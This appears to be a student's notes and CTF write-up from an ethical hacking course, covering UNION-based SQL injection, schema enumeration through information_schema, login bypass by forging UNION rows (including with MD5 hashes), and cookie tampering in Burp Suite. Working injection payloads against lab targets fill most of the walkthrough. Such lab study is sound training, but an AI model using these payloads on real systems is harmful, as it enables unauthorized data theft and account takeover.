Segfault ethical hacking week 6

 

1. Review

SQL Injection 1

Login page

You must create it yourself to understand how it works internally during login.
It’s essential to know what happens after identification/authentication and what results are returned when a SELECT statement is executed.
Only then can you study various approaches.
Make sure to build it, test it, practice with it, and research it thoroughly.

When problems occur

1) Identify the root cause

- Many times, problems can’t be solved because the root cause isn’t identified.

- It’s important to build and run it yourself to see where and why the issue occurs.

2) After that, you will be able to find a solution.

Prepared Statment 

SQL Injection is not possible.

SQL Injection 2

Data Extraction

1) A database (DB) is a place where data is used.

2) Does that data appear on the screen or not?

 - Appears on the web page: e.g., message boards

 - Does not appear on the web page: e.g., login, ID duplication check, etc.

When data appears on the web page
→ Methods of data extraction

1 or '1'='1

select * from board where idx='_____' or '1'='1

Union

SELECT * FROM board WHERE idx='_____' — the part after this can be modified.
By using UNION, you can execute another SELECT statement.

(select ~~~) union (select ~~~)

select pass from member union select id from member

select id,pass from member union select 1,2

select id,pass from member union select 'normaltic','test'

                                       

When using UNION, the number of columns must match exactly.

Order by Syntax

select id,pass from member order by id,pass

At the end of the SELECT statement, specify the column names you want to sort by.
(You can also use index numbers instead of column names.)

Union SQL Injection Process

1. Find SQL Injection Point

 

2. Find the number of Culumns

3. Find the Position of Displayed Columns

4. Check the Database Names

5. Check the Table Names

6. Check the Column Names

7. Extract the Data

Homework

1. Review Union SQL Injection

2. Display only Doldol's data (Show only one record that belongs to Doldol)

3. CTF Challenge

4. Web Development

   • Login 

   • Sign Up 

   • My Page (in progress)

   • Bulletin Board (to do)

1. SQL Injection 1

1) Finding the SQL Injection point

Enter Adminer%' and '1%'='1 to check if any data is returned.

2) Finding the number of columns

Entering Adminer%' order by 1# through 4# returns results.
From 5# onwards, no results are returned, indicating that there are 4 columns.

3) Finding the position of the displayed column

Enter: Adminer%' union select 1,2,3,4#

4) Checking the database name

Enter: Adminer% union select 1, database(), 3, 4#

I can find that the database name is sqli_1.

5) Finding table names

Enter:
Adminer%' union select 1, table_name, 3, 4 from information_schema.tables where table_schema='sqli_1'#

I can find flag_table and plusFlag_Table.
Check which one contains the actual flag.

6) Finding column names

Enter:
Adminer%' union select 1, column_name, 3, 4 from information_schema.columns where table_name='flag_table'#

I can confirm that the flag is being returned.

Enter:
Adminer%' union select 1, column_name, 3, 4 from information_schema.columns where table_name='plusFlag_Table'#

7) Displaying the data

Adminer%' union select flag,2,3,4 from flag_table#

Adminer%' union select idx,flag,3,4 from plusFlag_Table#

I find out this value as well. I have no idea what it is.

2. SQL Injection 2

1) Finding the SQL Injection point

Enter normaltic%' and '1%'='1 to check if any data is returned.

2) Finding the number of columns

Entering Adminer%' order by 1# through 6# returns results.
From 7# onwards, no results are returned, indicating that there are 6 columns.

3) Finding the position of the displayed columns

Enter:
normaltic%' union select 1, 2, 3, 4, 5, 6#

I can confirm that 1 displays the input value and 6 displays info.

4) Checking the database name

Enter:
normaltic%' union select 1, 2, 3, 4, 5, database()#

I can find that the database name is sqli_5.

5) Finding table names

Enter:
normaltic%' union select 1, 2, 3, 4, 5, table_name from information_schema.tables where table_schema='sqli_5'#

I can find a table named flag_honey.

6) Finding column names

normaltic%' union select 1,2,3,4,5,column_name from information_schema.columns where table_name='flag_honey'#

I can confirm that flag is returned.

7) Displaying Data

normaltic%' union select 1,2,3,4,5,flag from flag_honey#

But this turns out to be incorrect.

So you go back to the beginning.

2-1) Finding the SQL Injection point

Enter normaltic%' and '1%'='1 to check if any data is returned.

2-2) Finding the number of columns

Entering Adminer%' order by 1# through 6# returns results.
From 7# onward, no data is returned, indicating that there are 6 columns.

2-3) Finding the position of the displayed columns

Enter:
normaltic%' union select 1,2,3,4,5,6#

I can confirm that 1 shows the input value and 6 shows info

2-4) Checking the database name

Enter:
normaltic%' union select 1,2,3,4,5,database()#

I can find that the database name is sqli_5.

2-5) Finding table names

Enter:
normaltic%' union select 1,2,3,4,5,table_name from information_schema.tables where table_schema='sqli_5' order by 1#

normaltic%' union select 1,2,3,4,5,table_name from information_schema.tables where table_schema='sqli_5' order by 2#

I can find a table named secret..

2-7) Displaying data

Enter:
normaltic%' union select 1,2,3,4,5,flag from secret#

But this also doesn't work.

3-7) Displaying data

normaltic%' union select 1,2,3,4,5,flag from secret order by 1#

3. Login Bypass 3

1) Finding the SQL Injection point

• doldol' and '1'='1 / dol1234: Login successful

• doldol' or '1'='1 / dol1234: Login failed

• doldol'# / dol1234: Login successful

• doldol'# / 1234: Login failed

AND and comments are usable.
Password must match to log in.

2) Finding the number of columns

• doldol' order by 1#, 2#: Login works

• doldol' order by 3#: Error

So, there are 2 columns—likely ID and Password.

3) Login test

• 1' union select 'doldol',dol1234 / dol1234: Login successful

• 1' union select 'doldol','1234 / 1234: Login successful

4) Logging in as normaltic3

• 1' union select 'normaltic3','1234 / 1234: Login successful

4. Login Bypass 4

1) Finding the SQL Injection point

• doldol' and '1'='1 / dol1234: Login successful

• doldol' or '1'='1 / dol1234: Login failed

• doldol'# / dol1234: Login successful

• doldol'# / 1234: Login failed

AND and comments are usable.
Password must match to log in.

2) Finding the number of columns

• doldol' order by 1#, 2#: Login works

• doldol' order by 3#: Error

So, there are 2 columns—likely ID and Password.

3) Login test

• 1' union select 'doldol',dol1234 / dol1234: Login failed

• 1' union select 'doldol','1234 / 1234: Login failed

Possibly the password is being hashed and can't be matched in plaintext.

UPDATE table SET Password = MD5(Password) WHERE ID!=[specified index]

UPDATE users SET password = SHA('secret_password') WHERE ....;

You try using an MD5 hash:

1' union select 'doldol',MD5('dol1234')# / dol1234 Login successful

4) Login using normaltic4

1' union select 'normaltic4',MD5('1234')# / 1234 : Login successful

 

5. Login Bypass 5

1) Finding the SQL Injection point

• doldol' and '1'='1 / dol1234: Login successful

• doldol' or '1'='1 / dol1234: Login failed

• doldol'# / dol1234: Login successful

• doldol'# / 1234: Login failed

AND and comments are usable.
Password must match to log in.

2) Finding the number of columns

• doldol' order by 1#, 2#, 3#: Login works

• doldol' order by 4#: Error

So, there are 3 columns—likely ID, Password, and something else.

3) Login test

• 1' union select 'doldol',dol1234 / dol1234: Login failed

• 1' union select 'doldol','1234 / 1234: Login failed

4) Go back and check using Burp Suite

You discover in Burp Suite that after login,
the cookie shows the logged-in user as doldol,
and it's being redirected to index.php.

Send the request using Repeater and change the login user to normaltic5.

I got Flag